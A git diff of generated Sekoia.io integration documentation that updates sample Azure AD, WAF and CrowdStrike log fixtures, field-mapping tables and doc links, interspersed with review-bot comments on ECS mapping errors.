@@ -904,6 +900,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "azuread": { "Level": 4, + "authenticationDetails": [], "callerIpAddress": "11.11.11.11", "category": "SignInLogs", "correlationId": "e68960e2-8996-448c-ba7a-e54eeb8ff2ed", @@ -973,7 +970,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "user": { "email": "jane.doe@example.org", - "full_name": "Jane DOE" + "full_name": "Jane DOE", + "id": "469a0b32-4a8d-4b73-89aa-25ab78df7523" }, "user_agent": { "device": { diff --git a/_shared_content/operations_center/integrations/generated/19cd2ed6-f90c-47f7-a46b-974354a107bb_sample.md b/_shared_content/operations_center/integrations/generated/19cd2ed6-f90c-47f7-a46b-974354a107bb_sample.md index a95ad55045..40f9d902e0 100644 --- a/_shared_content/operations_center/integrations/generated/19cd2ed6-f90c-47f7-a46b-974354a107bb_sample.md +++ b/_shared_content/operations_center/integrations/generated/19cd2ed6-f90c-47f7-a46b-974354a107bb_sample.md 
@@ -312,99 +312,6 @@ In this section, you will find examples of raw logs as generated natively by the -=== "auth" - - - ```json - { - "id": "39e3a81e-99b9-4a30-8000-f38a970e5100", - "createdDateTime": "2020-09-28T10:12:41.4104242Z", - "userDisplayName": "Jane Doe", - "userPrincipalName": "jane.doe@sekoiacorp.onmicrosoft.com", - "userId": "913f4b76-e10f-4f1c-aaf1-09356389319b", - "appId": "4345a7b9-9a63-4910-a426-35363201d503", - "appDisplayName": "O365 Suite UX", - "ipAddress": "11.11.11.11", - "clientAppUsed": "Browser", - "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0", - "correlationId": "26e7584c-876b-425f-9119-49b411e21365", - "conditionalAccessStatus": "notApplied", - "originalRequestId": "39e3a81e-99b9-4a30-8000-f38a970e5100", - "isInteractive": false, - "tokenIssuerName": "", - "tokenIssuerType": "AzureAD", - "processingTimeInMilliseconds": 101, - "riskDetail": "hidden", - "riskLevelAggregated": "hidden", - "riskLevelDuringSignIn": "hidden", - "riskState": "none", - "riskEventTypes": [], - "riskEventTypes_v2": [], - "resourceDisplayName": "Windows Azure Active Directory", - "resourceId": "00000002-0000-0000-c000-000000000000", - "resourceTenantId": "aa09a079-7796-46a8-a4d4-4d21b0dcf1b2", - "authenticationMethodsUsed": [], - "authenticationRequirement": "multiFactorAuthentication", - "alternateSignInName": null, - "servicePrincipalName": null, - "signInEventTypes": [], - "servicePrincipalId": "", - "status": { - "errorCode": 0, - "failureReason": "Other.", - "additionalDetails": "MFA requirement satisfied by claim in the token" - }, - "deviceDetail": { - "deviceId": "", - "displayName": null, - "operatingSystem": "Windows 10", - "browser": "Firefox 81.0", - "isCompliant": null, - "isManaged": null, - "trustType": null - }, - "location": { - "city": "Paris", - "state": "Paris", - "countryOrRegion": "FR", - "geoCoordinates": { - "altitude": null, - "latitude": 48.861000061035156, - "longitude": 2.3380000591278076 - 
} - }, - "mfaDetail": { - "authMethod": null, - "authDetail": null - }, - "appliedConditionalAccessPolicies": [], - "authenticationProcessingDetails": [ - { - "key": "Login Hint Present", - "value": "True" - }, - { - "key": "IsCAEToken", - "value": "False" - } - ], - "networkLocationDetails": [], - "authenticationDetails": [ - { - "authenticationStepDateTime": "2020-09-28T10:12:41.4104242Z", - "authenticationMethod": null, - "authenticationMethodDetail": null, - "succeeded": true, - "authenticationStepResultDetail": "MFA requirement satisfied by claim in the token", - "authenticationStepRequirement": "User" - } - ], - "authenticationRequirementPolicies": [] - } - ``` - - - === "change_user_password" diff --git a/_shared_content/operations_center/integrations/generated/1d172ee6-cdc0-4713-9cfd-43f7d9595777.md b/_shared_content/operations_center/integrations/generated/1d172ee6-cdc0-4713-9cfd-43f7d9595777.md index 4d46acb2df..4b911c47b2 100644 --- a/_shared_content/operations_center/integrations/generated/1d172ee6-cdc0-4713-9cfd-43f7d9595777.md +++ b/_shared_content/operations_center/integrations/generated/1d172ee6-cdc0-4713-9cfd-43f7d9595777.md 
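Review bot: hunk @@ -312,99 +312,6 drops the only raw `auth` sample in the Graph `signIns` shape (`riskLevelDuringSignIn`, `conditionalAccessStatus`, `authenticationRequirement: "multiFactorAuthentication"`, `status.additionalDetails`, `authenticationDetails[].authenticationStepRequirement: "User"`), and the matching transformed event (jane.doe@sekoiacorp.onmicrosoft.com, Firefox 81.0) is deleted from the parent page in the same change. If the parser no longer accepts that format, say so in the PR description and the data-source table so users of the Graph export know it is unsupported; if it still does, keep the fixture so the format stays covered by the sample tests.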
@@ -22,7 +22,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "cisco_esa_cef.json" diff --git a/_shared_content/operations_center/integrations/generated/1df44c62-33d3-41d4-8176-f1fa13589eea.md b/_shared_content/operations_center/integrations/generated/1df44c62-33d3-41d4-8176-f1fa13589eea.md index cc31512514..ea5896cfbe 100644 --- a/_shared_content/operations_center/integrations/generated/1df44c62-33d3-41d4-8176-f1fa13589eea.md +++ b/_shared_content/operations_center/integrations/generated/1df44c62-33d3-41d4-8176-f1fa13589eea.md 
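Review bot: the `/docs/xdr/...` to `/xdr/...` link rewrite is applied file by file under `_shared_content/operations_center/integrations/generated/`; since these pages are generated, the same edit has to land in the template that produces the "Transformed Events Samples after Ingestion" paragraph, otherwise the next regeneration reverts every one of these hunks. Also confirm the three targets (`/xdr/features/detect/rules_catalog`, `/xdr/features/investigate/events`, `/xdr/features/detect/sigma`) resolve in the site's link checker, as this diff only changes the prefix and does not show the destination pages moving.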
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_1.json" diff --git a/_shared_content/operations_center/integrations/generated/20876735-c423-4bbc-9d19-67edc91fb063.md b/_shared_content/operations_center/integrations/generated/20876735-c423-4bbc-9d19-67edc91fb063.md index a23eecf3a7..a0dbc0aa21 100644 --- a/_shared_content/operations_center/integrations/generated/20876735-c423-4bbc-9d19-67edc91fb063.md +++ b/_shared_content/operations_center/integrations/generated/20876735-c423-4bbc-9d19-67edc91fb063.md 
@@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_audit_admin_event.json" diff --git a/_shared_content/operations_center/integrations/generated/2259adc3-9d93-4150-9c1c-46804e636084.md b/_shared_content/operations_center/integrations/generated/2259adc3-9d93-4150-9c1c-46804e636084.md index 7f1bae9329..f3cba3c92f 100644 --- a/_shared_content/operations_center/integrations/generated/2259adc3-9d93-4150-9c1c-46804e636084.md +++ b/_shared_content/operations_center/integrations/generated/2259adc3-9d93-4150-9c1c-46804e636084.md 
@@ -17,7 +17,87 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. 
+ +=== "attack.json" + + ```json + + { + "message": "cat=attack date_time=2023-12-08T02:34:17+01:00 user_id=9a8d2e96-0d28-48ef-ac6c-8e23236e9eaf user_name=jdoe@example.org login_user=\"Unknown\" ep_id=5446331978 app_name=\"Staging\" ep_region=europe-west3 ep_domain=staging.example.org src_ip=1.2.3.4 src_port=45344 backend_service=unknown dst_port=443 srccountry=\"Ireland\" service=https/tls1.3 action=Block main_type=\"Known Bots Detection\" sub_type=\"Crawler\" threat_level=Moderate threat_weight=25 http_host=staging.example.org http_url=/ http_version=1.x http_method=GET http_agent=\"Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)\" http_refer=none length=1546 signature_id=N/A signature_cve_id=N/A owasp_top10=\"N/A\" msg=\"Known Bots: Malicious Bot Netcraft in category Crawler Violation\" log_id=20000213 msg_id=001415055359", + "event": { + "action": "Block", + "message": "Known Bots: Malicious Bot Netcraft in category Crawler Violation" + }, + "action": { + "properties": { + "cat": "attack", + "log_id": "20000213" + } + }, + "destination": { + "port": 443 + }, + "host": { + "name": "tyR4LrYORLPlEIBp" + }, + "http": { + "request": { + "method": "GET", + "referrer": "none" + }, + "version": "1.x" + }, + "log": { + "hostname": "tyR4LrYORLPlEIBp" + }, + "related": { + "hosts": [ + "staging.example.org" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "address": "1.2.3.4", + "geo": { + "name": "Ireland" + }, + "ip": "1.2.3.4", + "port": 45344 + }, + "url": { + "domain": "staging.example.org", + "path": "/", + "registered_domain": "example.org", + "subdomain": "staging", + "top_level_domain": "org", + "username": "jdoe@example.org" + }, + "user": { + "domain": "example.org", + "email": "jdoe@example.org", + "id": "9a8d2e96-0d28-48ef-ac6c-8e23236e9eaf", + "name": "jdoe" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; 
+info@netcraft.com)", + "os": { + "name": "Other" + } + } + } + + ``` + === "https_traffic.json" @@ -67,9 +147,15 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "protocol": "tcp" }, "related": { + "hosts": [ + "api.sns-security.fr" + ], "ip": [ "172.26.8.20", "192.168.36.2" + ], + "user": [ + "Unknown" ] }, "rule": { @@ -87,9 +173,16 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "cipher": "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384" }, "url": { + "domain": "api.sns-security.fr", "path": "/apiv1/wan/list?take=12&skip=84&orderBy=ponderationValue&sortDirection=desc&filter[]=monitor,equalsBool,true&filter[]=status,equal,DOWN", + "registered_domain": "sns-security.fr", + "subdomain": "api", + "top_level_domain": "fr", "username": "Unknown" }, + "user": { + "name": "Unknown" + }, "user_agent": { "device": { "name": "Other" @@ -155,6 +248,7 @@ The following table lists the fields that are extracted, normalized under the EC | Name | Type | Description | | ---- | ---- | ---------------------------| +|`action.properties.cat` | `keyword` | | |`action.properties.device_id` | `keyword` | | |`action.properties.log_id` | `keyword` | | |`destination.ip` | `ip` | IP address of the destination. | 
@@ -176,8 +270,12 @@ The following table lists the fields that are extracted, normalized under the EC |`source.ip` | `ip` | IP address of the source. | |`source.port` | `long` | Port of the source. | |`tls.cipher` | `keyword` | String indicating the cipher used during the current connection. | +|`url.domain` | `keyword` | Domain of the url. | |`url.path` | `wildcard` | Path of the request, such as "/search". | |`url.username` | `keyword` | Username of the request. | +|`user.domain` | `keyword` | Name of the directory the user is a member of. | +|`user.email` | `keyword` | User email address. | +|`user.id` | `keyword` | Unique identifier of the user. | |`user.name` | `keyword` | Short name or login of the user. | |`user_agent.original` | `keyword` | Unparsed user_agent string. | diff --git a/_shared_content/operations_center/integrations/generated/2259adc3-9d93-4150-9c1c-46804e636084_sample.md b/_shared_content/operations_center/integrations/generated/2259adc3-9d93-4150-9c1c-46804e636084_sample.md index 75df9b7a6b..e80daee7c3 100644 --- a/_shared_content/operations_center/integrations/generated/2259adc3-9d93-4150-9c1c-46804e636084_sample.md +++ b/_shared_content/operations_center/integrations/generated/2259adc3-9d93-4150-9c1c-46804e636084_sample.md 
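Review bot: the new `attack.json` transformed event in hunk @@ -17,7 +17,87 carries no `event.category`, `event.type` or `event.kind`, only `event.action` and `event.message`, so built-in rules that filter on `event.category` (for example `network` or `intrusion_detection`) will never match a WAF block. Three further mapping problems in the same hunk: `url.username` is set to `jdoe@example.org` although the request URL is `/` on `staging.example.org` (ECS `url.username` is the userinfo part of the URL, and `user.email` already holds this value); `srccountry="Ireland"` lands in `source.geo.name` instead of `source.geo.country_name`; and the literal placeholder `http_refer=none` is indexed as `http.request.referrer: "none"`. The fields that actually describe the detection (`main_type`, `sub_type`, `threat_level`, `threat_weight`, `signature_id`, `signature_cve_id`, `owasp_top10`, `service=https/tls1.3`, `http_host`, `msg_id`) are dropped entirely; at least `main_type`/`sub_type` (as `rule.category`/`rule.name`) and `threat_level`/`threat_weight` (as `event.severity`) should be kept, since they are what a rule on this source would key on.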
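Review bot: in the `https_traffic.json` hunks (@@ -67,9 +147,15 and @@ -87,9 +173,16) the literal `Unknown` from `login_user="Unknown"` is now indexed into `user.name`, `url.username` and `related.user`, so `related.user` searches will return every unauthenticated request; in the `attack.json` event the same `login_user="Unknown"` is ignored and `user.name` is derived from the local part of `user_name` instead. Treat `Unknown` as absent in both paths and populate `user.*` and `related.user` only from a real principal, so the two event types agree.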
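Review bot: hunk @@ -176,8 +270,12 adds `url.domain`, `user.domain`, `user.email` and `user.id` to the field table, but `url.registered_domain`, `url.subdomain` and `url.top_level_domain`, which both samples in this change now produce, are still absent between the `url.path` and `url.username` rows. If the table is meant to list every field available to detection rules, add those rows; if derived fields are intentionally excluded, note that convention above the table so readers do not assume the field is missing from the events.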
@@ -4,6 +4,14 @@ In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. +=== "attack" + + ``` + cat=attack date_time=2023-12-08T02:34:17+01:00 user_id=9a8d2e96-0d28-48ef-ac6c-8e23236e9eaf user_name=jdoe@example.org login_user="Unknown" ep_id=5446331978 app_name="Staging" ep_region=europe-west3 ep_domain=staging.example.org src_ip=1.2.3.4 src_port=45344 backend_service=unknown dst_port=443 srccountry="Ireland" service=https/tls1.3 action=Block main_type="Known Bots Detection" sub_type="Crawler" threat_level=Moderate threat_weight=25 http_host=staging.example.org http_url=/ http_version=1.x http_method=GET http_agent="Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" http_refer=none length=1546 signature_id=N/A signature_cve_id=N/A owasp_top10="N/A" msg="Known Bots: Malicious Bot Netcraft in category Crawler Violation" log_id=20000213 msg_id=001415055359 + ``` + + + === "https_traffic" ``` diff --git a/_shared_content/operations_center/integrations/generated/22f2afd2-c858-443d-8e06-7b335e439c29.md b/_shared_content/operations_center/integrations/generated/22f2afd2-c858-443d-8e06-7b335e439c29.md index f57b02e1f5..ac714c0d1f 100644 --- a/_shared_content/operations_center/integrations/generated/22f2afd2-c858-443d-8e06-7b335e439c29.md +++ b/_shared_content/operations_center/integrations/generated/22f2afd2-c858-443d-8e06-7b335e439c29.md 
@@ -25,14 +25,14 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. 
=== "auth_activity_audit.json" ```json { - "message": "{\"metadata\":{\"customerIDString\":\"46de5283260647ec8f28def00bffd094\",\"offset\":6755,\"eventType\":\"AuthActivityAuditEvent\",\"eventCreationTime\":1657663146099,\"version\":\"1.0\"},\"event\":{\"UserId\":\"foo.bar@sekoia.fr\",\"UserIp\":\"83.199.26.17\",\"OperationName\":\"twoFactorAuthenticate\",\"ServiceName\":\"CrowdStrike Authentication\",\"Success\":true,\"UTCTimestamp\":1657663146099}}", + "message": "{\"metadata\": {\"customerIDString\": \"46de5283260647ec8f28def00bffd094\", \"offset\": 6755, \"eventType\": \"AuthActivityAuditEvent\", \"eventCreationTime\": 1657663146099, \"version\": \"1.0\"}, \"event\": {\"UserId\": \"foo.bar@sekoia.fr\", \"UserIp\": \"83.199.26.17\", \"OperationName\": \"twoFactorAuthenticate\", \"ServiceName\": \"CrowdStrike Authentication\", \"Success\": true, \"UTCTimestamp\": 1657663146099}}", "event": { "category": [ "configuration" 
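Review bot: every `message` change in this file (hunks @@ -25,14 +25,14, @@ -71,7 +71,7, @@ -140,7 +140,7, @@ -229,7 +235,7 and @@ -269,7 +275,7) only inserts a space after each `:` and `,`, i.e. the raw fixture was round-tripped through a JSON serializer with default separators. The streaming API emits the compact form that the old lines show, and the companion `_sample.md` pages present these strings as logs "as generated natively by the source", so either keep at least one compact-form fixture (and state that the parser is whitespace-agnostic) or stop the regeneration step from rewriting the raw `message` values, otherwise the samples drift from what the source actually sends.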
@@ -71,7 +71,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"metadata\":{\"customerIDString\":\"46de5283260647ec8f28def00bffd094\",\"offset\":189,\"eventType\":\"DetectionSummaryEvent\",\"eventCreationTime\":1657174538000,\"version\":\"1.0\"},\"event\":{\"ProcessStartTime\":1656688889,\"ProcessEndTime\":0,\"ProcessId\":22164474048,\"ParentProcessId\":22163465296,\"ComputerName\":\"nsewmkzevukn-vm\",\"UserName\":\"Administrator\",\"DetectName\":\"Overwatch Detection\",\"DetectDescription\":\"Falcon Overwatch has identified malicious activity carried out by a suspected or known eCrime operator. This activity has been raised for critical action and should be investigated urgently.\",\"Severity\":5,\"SeverityName\":\"Critical\",\"FileName\":\"explorer.exe\",\"FilePath\":\"\\\\Device\\\\HarddiskVolume2\\\\Windows\",\"CommandLine\":\"C:\\\\Windows\\\\Explorer.EXE\",\"SHA256String\":\"249cb3cb46fd875196e7ed4a8736271a64ff2d8132357222a283be53e7232ed3\",\"MD5String\":\"d45bd7c7b7bf977246e9409d63435231\",\"SHA1String\":\"0000000000000000000000000000000000000000\",\"MachineDomain\":\"nsewmkzevukn-vm\",\"HostGroups\": \"6252fc7505974dc38abfef73269b8deb,b3365faa2fe44893b3c2c6b3bfbf6650,e114797a97894ed3bfd6442ef7eead92,1cd4a1385cac4db1a4d5f4d7ce035b65,2faa12f2f1e046f2bc21cad5d01ae723,37f2ae7c641845a4918f4348a52b4874\"}}", + "message": "{\"metadata\": {\"customerIDString\": \"46de5283260647ec8f28def00bffd094\", \"offset\": 189, \"eventType\": \"DetectionSummaryEvent\", \"eventCreationTime\": 1657174538000, \"version\": \"1.0\"}, \"event\": {\"ProcessStartTime\": 1656688889, \"ProcessEndTime\": 0, \"ProcessId\": 22164474048, \"ParentProcessId\": 22163465296, \"ComputerName\": \"nsewmkzevukn-vm\", \"UserName\": \"Administrator\", \"DetectName\": \"Overwatch Detection\", \"DetectDescription\": \"Falcon Overwatch has identified malicious activity carried out by a suspected or known eCrime operator. 
This activity has been raised for critical action and should be investigated urgently.\", \"Severity\": 5, \"SeverityName\": \"Critical\", \"FileName\": \"explorer.exe\", \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\Windows\", \"CommandLine\": \"C:\\\\Windows\\\\Explorer.EXE\", \"SHA256String\": \"249cb3cb46fd875196e7ed4a8736271a64ff2d8132357222a283be53e7232ed3\", \"MD5String\": \"d45bd7c7b7bf977246e9409d63435231\", \"SHA1String\": \"0000000000000000000000000000000000000000\", \"MachineDomain\": \"nsewmkzevukn-vm\", \"HostGroups\": \"6252fc7505974dc38abfef73269b8deb,b3365faa2fe44893b3c2c6b3bfbf6650,e114797a97894ed3bfd6442ef7eead92,1cd4a1385cac4db1a4d5f4d7ce035b65,2faa12f2f1e046f2bc21cad5d01ae723,37f2ae7c641845a4918f4348a52b4874\"}}", "event": { "category": [ "intrusion_detection" 
@@ -140,7 +140,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"metadata\":{\"customerIDString\":\"44be50f58ccfcfcfcfcfcfcfcffc\",\"offset\":111111,\"eventType\":\"DetectionSummaryEvent\",\"eventCreationTime\":1682930000000,\"version\":\"1.0\"},\"event\":{\"ProcessStartTime\":1682930000000,\"ProcessEndTime\":1682930000000,\"ProcessId\":1682930000000,\"ParentProcessId\":1682930000000,\"ComputerName\":\"ComputerName\",\"UserName\":\"Username\",\"DetectName\":\"DetectName\",\"DetectDescription\":\"This file meets the Adware/PUP Anti-malware ML algorithms high-confidence threshold.\",\"Severity\":2,\"SeverityName\":\"Low\",\"FileName\":\"Setup_test.exe\",\"FilePath\":\"\\\\Device\\\\Downloads\",\"CommandLine\":\"\\\"C:\\\\Setup_test.exe\\\" \",\"SHA256String\":\"76da317a8e17b7d773f09e3a7487\",\"MD5String\":\"b97cdbe4a9b032\",\"SHA1String\":\"00000000000000000\",\"MachineDomain\":\"AD\",\"FalconHostLink\":\"https://test.com/activity/\",\"SensorId\":\"c9794942866f428\",\"IOCType\":\"hash_sha256\",\"IOCValue\":\"76da317a8e17b7d773f09e3a748782e\",\"DetectId\":\"ldt:c9794942866f:26628996\",\"QuarantineFiles\":[{\"ImageFileName\":\"\\\\Device\\\\Setup_test.exe\",\"SHA256HashData\":\"76da317a8e17b7d773f09e\"}],\"LocalIP\":\"1.2.3.4\",\"MACAddress\":\"00-01-02-03-04-05\",\"Tactic\":\"Machine Learning\",\"Technique\":\"Adware/PUP\",\"Objective\":\"Falcon Detection Method\",\"PatternDispositionDescription\":\"Prevention/Quarantine, process was blocked from execution and quarantine was 
attempted.\",\"PatternDispositionValue\":2222,\"PatternDispositionFlags\":{\"Indicator\":false,\"Detect\":false,\"InddetMask\":false,\"SensorOnly\":false,\"Rooting\":false,\"KillProcess\":false,\"KillSubProcess\":false,\"QuarantineMachine\":false,\"QuarantineFile\":true,\"PolicyDisabled\":false,\"KillParent\":false,\"OperationBlocked\":false,\"ProcessBlocked\":true,\"RegistryOperationBlocked\":false,\"CriticalProcessDisabled\":false,\"BootupSafeguardEnabled\":false,\"FsOperationBlocked\":false,\"HandleOperationDowngraded\":false,\"KillActionFailed\":false,\"BlockingUnsupportedOrDisabled\":false,\"SuspendProcess\":false,\"SuspendParent\":false},\"ParentImageFileName\":\"\\\\Device\\\\test.exe\",\"ParentCommandLine\":\"\\\"C:\\\\Program Files (x86)\\\\test.exe\\\" \",\"GrandparentImageFileName\":\"\\\\Device\\\\test.exe\",\"GrandparentCommandLine\":\"test.exe\",\"AssociatedFile\":\"\\\\Device\\\\test.exe\",\"PatternId\":5555}}", + "message": "{\"metadata\": {\"customerIDString\": \"44be50f58ccfcfcfcfcfcfcfcffc\", \"offset\": 111111, \"eventType\": \"DetectionSummaryEvent\", \"eventCreationTime\": 1682930000000, \"version\": \"1.0\"}, \"event\": {\"ProcessStartTime\": 1682930000000, \"ProcessEndTime\": 1682930000000, \"ProcessId\": 1682930000000, \"ParentProcessId\": 1682930000000, \"ComputerName\": \"ComputerName\", \"UserName\": \"Username\", \"DetectName\": \"DetectName\", \"DetectDescription\": \"This file meets the Adware/PUP Anti-malware ML algorithms high-confidence threshold.\", \"Severity\": 2, \"SeverityName\": \"Low\", \"FileName\": \"Setup_test.exe\", \"FilePath\": \"\\\\Device\\\\Downloads\", \"CommandLine\": \"\\\"C:\\\\Setup_test.exe\\\" \", \"SHA256String\": \"76da317a8e17b7d773f09e3a7487\", \"MD5String\": \"b97cdbe4a9b032\", \"SHA1String\": \"00000000000000000\", \"MachineDomain\": \"AD\", \"FalconHostLink\": \"https://test.com/activity/\", \"SensorId\": \"c9794942866f428\", \"IOCType\": \"hash_sha256\", \"IOCValue\": 
\"76da317a8e17b7d773f09e3a748782e\", \"DetectId\": \"ldt:c9794942866f:26628996\", \"QuarantineFiles\": [{\"ImageFileName\": \"\\\\Device\\\\Setup_test.exe\", \"SHA256HashData\": \"76da317a8e17b7d773f09e\"}], \"LocalIP\": \"1.2.3.4\", \"MACAddress\": \"00-01-02-03-04-05\", \"Tactic\": \"Machine Learning\", \"Technique\": \"Adware/PUP\", \"Objective\": \"Falcon Detection Method\", \"PatternDispositionDescription\": \"Prevention/Quarantine, process was blocked from execution and quarantine was attempted.\", \"PatternDispositionValue\": 2222, \"PatternDispositionFlags\": {\"Indicator\": false, \"Detect\": false, \"InddetMask\": false, \"SensorOnly\": false, \"Rooting\": false, \"KillProcess\": false, \"KillSubProcess\": false, \"QuarantineMachine\": false, \"QuarantineFile\": true, \"PolicyDisabled\": false, \"KillParent\": false, \"OperationBlocked\": false, \"ProcessBlocked\": true, \"RegistryOperationBlocked\": false, \"CriticalProcessDisabled\": false, \"BootupSafeguardEnabled\": false, \"FsOperationBlocked\": false, \"HandleOperationDowngraded\": false, \"KillActionFailed\": false, \"BlockingUnsupportedOrDisabled\": false, \"SuspendProcess\": false, \"SuspendParent\": false}, \"ParentImageFileName\": \"\\\\Device\\\\test.exe\", \"ParentCommandLine\": \"\\\"C:\\\\Program Files (x86)\\\\test.exe\\\" \", \"GrandparentImageFileName\": \"\\\\Device\\\\test.exe\", \"GrandparentCommandLine\": \"test.exe\", \"AssociatedFile\": \"\\\\Device\\\\test.exe\", \"PatternId\": 5555}}", "event": { "category": [ "intrusion_detection" @@ -159,14 +159,20 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "severity_name": "Low" }, "file": { + "directory": "\\Device", "hash": { "md5": "b97cdbe4a9b032", "sha256": "76da317a8e17b7d773f09e3a7487" - } + }, + "name": "test.exe" }, "host": { - "ip": "1.2.3.4", - "mac": "00-01-02-03-04-05", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-01-02-03-04-05" + ], "name": "ComputerName" }, "log": { 
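Review bot: in hunk @@ -159,14 +159,20 the new `file.name: "test.exe"` and `file.directory: "\\Device"` do not come from the detected file (`FileName: "Setup_test.exe"`, `FilePath: "\\Device\\Downloads"`) but match the `ParentImageFileName`/`AssociatedFile` value `\\Device\\test.exe`, while `file.hash.sha256` still holds the hash of `Setup_test.exe`. A rule that combines `file.name` with `file.hash.sha256` would now describe two different files; map `file.name`/`file.directory` from `FileName`/`FilePath` and put the parent image under `process.parent.executable`. The switch of `host.ip` and `host.mac` from scalars to arrays matches ECS, but it changes the shape of two fields existing rules may compare against, so call it out in the changelog for this integration.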
@@ -229,7 +235,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"metadata\":{\"customerIDString\":\"46de5283260647ec8f28def00bffd094\",\"offset\":733,\"eventType\":\"UserActivityAuditEvent\",\"eventCreationTime\":1657614940000,\"version\":\"1.0\"},\"event\":{\"UserId\":\"foo.bar@sekoia.fr\",\"UserIp\":\"185.162.177.26\",\"OperationName\":\"detection_update\",\"ServiceName\":\"detections\",\"AuditKeyValues\":[{\"Key\":\"detection_id\",\"ValueString\":\"ldt:5418788591a444d1b45c2b39d3b07b50:21483381998\"},{\"Key\":\"new_state\",\"ValueString\":\"closed\"},{\"Key\":\"assigned_to\",\"ValueString\":\"Erwan Chevalier\"},{\"Key\":\"assigned_to_uid\",\"ValueString\":\"foo.bar@sekoia.fr\"}],\"UTCTimestamp\":1657614940}}", + "message": "{\"metadata\": {\"customerIDString\": \"46de5283260647ec8f28def00bffd094\", \"offset\": 733, \"eventType\": \"UserActivityAuditEvent\", \"eventCreationTime\": 1657614940000, \"version\": \"1.0\"}, \"event\": {\"UserId\": \"foo.bar@sekoia.fr\", \"UserIp\": \"185.162.177.26\", \"OperationName\": \"detection_update\", \"ServiceName\": \"detections\", \"AuditKeyValues\": [{\"Key\": \"detection_id\", \"ValueString\": \"ldt:5418788591a444d1b45c2b39d3b07b50:21483381998\"}, {\"Key\": \"new_state\", \"ValueString\": \"closed\"}, {\"Key\": \"assigned_to\", \"ValueString\": \"Erwan Chevalier\"}, {\"Key\": \"assigned_to_uid\", \"ValueString\": \"foo.bar@sekoia.fr\"}], \"UTCTimestamp\": 1657614940}}", "event": { 